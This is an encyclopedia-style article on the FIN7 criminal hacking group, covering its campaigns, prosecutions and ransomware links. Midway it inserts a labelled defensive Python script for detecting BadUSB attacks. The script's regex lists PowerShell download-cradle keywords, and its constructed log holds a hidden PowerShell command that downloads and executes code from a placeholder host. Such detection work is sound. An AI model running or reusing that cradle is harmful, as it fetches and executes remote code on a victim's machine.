FIN7

{{Short description|Criminal hacking organization}}

{{Infobox organization
| name = FIN7
| formation = 2015
| image =
| alt =
| caption =
| map =
| abbreviation =
| dissolved =
| type = Hacking
| purpose =
| headquarters =
| membership =
| leader_title =
| leader_name =
| main_organ =
| parent_organization =
| affiliations = BlackCat
| budget =
| website =
| remarks =
| image_border =
| size =
| msize =
| malt =
| mcaption =
| motto =
| region_served =
| num_staff =
| num_volunteers =
}}

FIN7, also called Carbon Spider, ELBRUS, or Sangria Tempest,{{cite web |title=How Microsoft names threat actors |url=https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming |publisher=Microsoft |access-date=21 January 2024}} is a Russian criminal advanced persistent threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. A portion of FIN7 is run out of the front company Combi Security. It has been called one of the most successful criminal hacking groups in the world.{{Cite magazine |title=Fin7: The Billion-Dollar Hacking Group Behind a String of Big Breaches |magazine=Wired |access-date=2021-03-15 |issn=1059-1028}} FIN7 is also associated with GOLD NIAGARA, ITG14, ALPHV and BlackCat.{{Cite web |title=FIN7, GOLD NIAGARA, ITG14, Carbon Spider, Group G0046 {{!}} MITRE ATT&CK® |url=https://attack.mitre.org/groups/G0046/ |access-date=2022-03-01 |website=attack.mitre.org}}{{Cite news |title=ALPHV/BlackCat ransomware family becoming more dangerous |url=https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous |last=Scroxton |first=Alex |date=2022-09-22 |access-date=2023-02-12 |publisher=Computer Weekly}}

History

In March 2017 FIN7 ran a spearphishing campaign against company employees involved with SEC filings.{{Cite web |title=FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings |url=https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |access-date=2021-03-15 |website=FireEye |language=en |archive-date=2021-04-19 |archive-url=https://web.archive.org/web/20210419132358/https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |url-status=dead }}

In August 2018 three members of FIN7 were charged by the United States Department of Justice for cybercrimes that impacted more than 100 U.S. companies.{{Cite web |date=2018-08-01 |title=Three Members of Notorious International Cybercrime Group "Fin7" In Custody for Role in Attacking Over 100 U.S. companies |url=https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100 |access-date=2021-03-15 |website=www.justice.gov |language=en}}

In November 2018 it was reported that FIN7 was behind data breaches of Red Robin, Chili's, Arby's, Burgerville, Omni Hotels and Saks Fifth Avenue.{{Cite web |last=Gorelik |first=Michael |title=FIN7 Not Finished – Morphisec Spots New Campaign |url=https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign |access-date=2021-03-15 |website=blog.morphisec.com |language=en-us}}

In March 2020, the FBI issued a warning that members of FIN7 had been targeting companies in the retail, restaurant, and hotel industries with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.{{ r | BC_2020-03-27 }} Packages were sent to employees in IT, executive management, and human resources departments.{{ r | BC_2020-03-27 }} One intended target was sent a package in the mail containing a fake Best Buy gift card and a USB flash drive, with a letter stating that the recipient should plug the drive into their computer to see the list of items that could be purchased with the gift card.{{ r | BC_2020-03-27 | ZDNET_2020-03-26 }} When tested, the USB drive emulated a keyboard and injected a series of keystrokes that opened a PowerShell window and issued commands to download malware onto the test computer; the malware then contacted servers in Russia.{{ cite news | url=https://www.bleepingcomputer.com/news/security/fbi-hackers-sending-malicious-usb-drives-and-teddy-bears-via-usps/ | title=FBI: Hackers Sending Malicious USB Drives & Teddy Bears via USPS | last=Ilascu | first=Ionut | newspaper=Bleeping Computer | date=2020-03-27 | quote=This is not a one-off incident, though. The FBI warns that FIN7 has mailed these packages via USPS to numerous businesses (retail, restaurant, hotel industry) where they target employees in human resources, IT, or executive management departments. These packages sometimes include "gifts" like teddy bears or gift cards. These USB drives are configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker. Then, the USB device contacts domains or IP addresses in Russia. }}{{cite web |last=Cimpanu |first=Catalin |date=March 26, 2020 |title=Rare BadUSB attack detected in the wild against US hospitality provider |language=en |website=ZDNet |url=https://www.zdnet.com/article/rare-badusb-attack-detected-in-the-wild-against-us-hospitality-provider/ |access-date=2021-09-07 |url-status=live|archive-url=https://web.archive.org/web/20200326141904/https://www.zdnet.com/article/rare-badusb-attack-detected-in-the-wild-against-us-hospitality-provider/ |archive-date=2020-03-26 }}

In December 2020 it was reported that FIN7 may be a close collaborator of the Ryuk group.{{Cite web |date=2020-12-22 |title=Collaboration between FIN7 and the RYUK group, a Truesec Investigation |url=https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/ |access-date=2021-03-15 |website=TRUESEC Blog |language=en-US}}

In April 2021 a "high-level manager" of FIN7, Fedir Hladyr from Ukraine, was sentenced to 10 years in prison in the United States after he pleaded guilty to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking.{{Cite web |date=2021-04-16 |title=High-level organizer of notorious hacking group FIN7 sentenced to ten years in prison for scheme that compromised tens of millions of debit and credit cards |url=https://www.justice.gov/usao-wdwa/pr/high-level-organizer-notorious-hacking-group-fin7-sentenced-ten-years-prison-scheme |access-date=2021-04-22 |website=www.justice.gov |language=en}}{{Cite web |last=Palmer |first=Danny |title='High-level' organiser of FIN7 hacking group sentenced to 10 years in prison |url=https://www.zdnet.com/article/high-level-organiser-of-fin7-hacking-group-sentenced-to-ten-years-in-prison/ |access-date=2021-04-22 |website=ZDNet |language=en}}

In January 2022, the FBI issued a warning that members of FIN7 had been targeting transportation and insurance companies (since August 2021) and defense companies (since November 2021) with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.{{ r | BP_2022-01-07 | ZDNET_2022-01-10 }} The intended targets were sent USB drives in packages claiming to be from Amazon or the United States Department of Health and Human Services, with letters about free gift cards or COVID-19 protocols that were purportedly explained further by information on the USB drive.{{ r | BP_2022-01-07 | ZDNET_2022-01-10 }} When plugged in, the USB drives emulate a keyboard and inject a series of keystrokes that open a PowerShell window and issue commands to download malware.{{ cite news | url=https://www.bleepingcomputer.com/news/security/fbi-hackers-use-badusb-to-target-defense-firms-with-ransomware/ | title=FBI: Hackers use BadUSB to target defense firms with ransomware | last=Gatlan | first=Sergiu | newspaper=Bleeping Computer | date=2022-01-07 | quote=FIN7 operators impersonated Amazon and the US Department of Health & Human Services (HHS) to trick the targets into opening the packages and connecting the USB drives to their systems. Since August, reports received by the FBI say that these malicious packages also contain letters about COVID-19 guidelines or counterfeit gift cards and forged thank you notes, depending on the impersonated entity. }}{{ cite news | url=https://www.zdnet.com/article/fbi-cybercriminals-are-mailing-out-usb-drives-that-will-install-ransomware/ | title=Ransomware warning: Cyber criminals are mailing out USB drives that install malware | last=Tung | first=Liam | newspaper=ZDNET | date=2022-01-10 }}
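Both FBI warnings above describe the same host-level sequence: a mailed drive that enumerates as a keyboard, followed seconds later by a PowerShell process that downloads a payload. That pairing is what a defender can correlate. The script below is an added detection example written for this article; it is not taken from the article, the FBI, or the cited reporting. The log lines are constructed, and the JSON field names, the use of Windows Security event 6416 ("a new external device was recognized") for device arrival, and a Sysmon-style event 1 for process creation are assumptions about the log source that would need adapting to a real SIEM.

```python
"""Correlate new keyboard-class USB devices with PowerShell download cradles.

Added example, not from the article. Event IDs (6416 for device arrival,
1 for process creation) and field names are assumptions about the log source;
the sample log below is constructed.
"""
import json
import re
from datetime import datetime, timedelta

# Command-line fragments typical of a keystroke-injected download cradle.
# Illustrative only; a production rule would be tuned to the environment.
DOWNLOAD_PATTERNS = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Start-BitsTransfer|-enc(odedcommand)?\b|FromBase64String)",
    re.IGNORECASE,
)

# A device arrival and a PowerShell launch further apart than this are ignored.
WINDOW = timedelta(seconds=30)

# Constructed sample log: one true positive (WS-HR-07), one benign storage
# device (WS-IT-03), and one benign keyboard plus harmless PowerShell (WS-EXEC-01).
# Vendor/product IDs and hostnames are placeholders.
SAMPLE_LOG = r"""
{"ts":"2022-01-07T09:14:02","event_id":6416,"host":"WS-HR-07","device_class":"Keyboard","device_id":"USB\\VID_1234&PID_0001\\7&1a2b3c"}
{"ts":"2022-01-07T09:14:11","event_id":1,"host":"WS-HR-07","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"}
{"ts":"2022-01-07T10:02:45","event_id":6416,"host":"WS-IT-03","device_class":"DiskDrive","device_id":"USB\\VID_1234&PID_0002\\4C530001"}
{"ts":"2022-01-07T10:40:00","event_id":1,"host":"WS-IT-03","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -File C:\\scripts\\inventory.ps1"}
{"ts":"2022-01-07T11:30:12","event_id":6416,"host":"WS-EXEC-01","device_class":"Keyboard","device_id":"USB\\VID_1234&PID_0003\\5&2f3e"}
{"ts":"2022-01-07T11:45:40","event_id":1,"host":"WS-EXEC-01","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell Get-Process"}
"""


def parse_events(text):
    """Parse JSON-lines log text into event dicts with datetime timestamps."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def is_keyboard_arrival(ev):
    """True for a device-arrival event whose class is a keyboard (HID injector)."""
    return ev["event_id"] == 6416 and ev.get("device_class", "").lower() == "keyboard"


def is_suspicious_powershell(ev):
    """True for a PowerShell process creation whose command line fetches content."""
    return (
        ev["event_id"] == 1
        and ev.get("image", "").lower().endswith("powershell.exe")
        and DOWNLOAD_PATTERNS.search(ev.get("cmdline", "")) is not None
    )


def find_badusb_candidates(events, window=WINDOW):
    """Return (host, device_id, cmdline) for every PowerShell download launched
    within `window` after a new keyboard-class device appeared on the same host."""
    recent_keyboards = {}  # host -> list of (arrival time, device_id)
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        host = ev["host"]
        if is_keyboard_arrival(ev):
            recent_keyboards.setdefault(host, []).append((ev["ts"], ev["device_id"]))
        elif is_suspicious_powershell(ev):
            for arrived, device_id in recent_keyboards.get(host, []):
                if timedelta(0) <= ev["ts"] - arrived <= window:
                    hits.append((host, device_id, ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for host, device_id, cmdline in find_badusb_candidates(parse_events(SAMPLE_LOG)):
        print(f"[ALERT] {host}: keyboard {device_id} followed by PowerShell download: {cmdline}")
```

Run against the constructed log, only WS-HR-07 is flagged: the disk drive on WS-IT-03 is not a keyboard, and the keyboard on WS-EXEC-01 is followed by an ordinary PowerShell invocation fifteen minutes later. In practice the same correlation is usually expressed as a SIEM rule, and the two enabling controls are turning on Audit PnP Activity (or the equivalent device telemetry) and command-line logging for process creation; without both, neither half of the sequence is visible.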

In 2021 the group began using ransomware known as ALPHV (BlackCat), written in Rust, which was offered to affiliates as Ransomware as a Service.{{Cite web |url=https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat |title=2022-004: ACSC Ransomware Profile – ALPHV (aka BlackCat) |date=2022-04-14 |access-date=2023-02-12 |website=Australian Cyber Security Centre}}

In February 2023 the group was named in the Irish High Court as being behind the Munster Technological University ransomware attack.{{Cite news |title=MTU Cork confirms hackers have encrypted university data and demanded a ransom |url=https://www.thejournal.ie/mtu-cork-campuses-remain-closed-it-breach-5990335-Feb2023/ |last1=Moore |first1=Jane |work=TheJournal.ie |last2=O'Connor |first2=Niall}}

References